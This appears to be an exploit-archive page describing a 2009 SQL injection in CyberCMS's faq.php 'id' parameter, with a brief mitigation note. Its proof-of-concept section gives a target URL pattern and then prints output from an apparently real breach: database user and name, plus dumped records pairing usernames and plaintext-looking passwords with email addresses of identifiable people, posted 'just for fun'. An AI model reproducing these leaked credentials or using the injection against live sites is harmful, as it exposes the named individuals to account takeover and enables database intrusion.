header-logo
Suggest Exploit
vendor:
CyberCMS
by:
hc0de
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CyberCMS
Affected Version From: [app version]
Affected Version To: [app version]
Patch Exists: NO
Related CWE: N/A
CPE: a:cyberfusion:cyber-cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Linux 9.04
2009

CyberCMS Remote SQL Injection Vuln.

CyberCMS is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending malicious SQL code to the vulnerable parameter 'id' in the faq.php file. This can allow an attacker to gain access to the MySQL database, including usernames and passwords. The MySQL version used is 5.0.37-community-nt and the database is uskole.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: CyberCMS Remote SQL Injection Vuln.
# Date: 26/11/2009
# Author: hc0de | hc0de.blogspot.com<http://hc0de.blogspot.com>
# Software Link: http://cyberfusion.ramx.org/cyber-cms
# Version: [app version]
# Tested on: Ubuntu Linux 9.04
# CVE :
# PoC:

+Target: http://server/faq.php?id=SQL_CODE

-MySQL Version: 5.0.37-community-nt
-MySQL User: skoleung@localhost
-MySQL Database: uskole

+Datas:
3:memborg:memborg:1:memborg@cyberfusion.dk<mailto:3%3Amemborg%3Amemborg%3A1%3Amemborg@cyberfusion.dk>
6:Leder:huskerikke:1:john.landbo@morsoe.dk<mailto:6%3ALeder%3Ahuskerikke%3A1%3Ajohn.landbo@morsoe.dk>
...etc.. :) just for fun :P

Navigation

Suggest Exploit

Services By CQR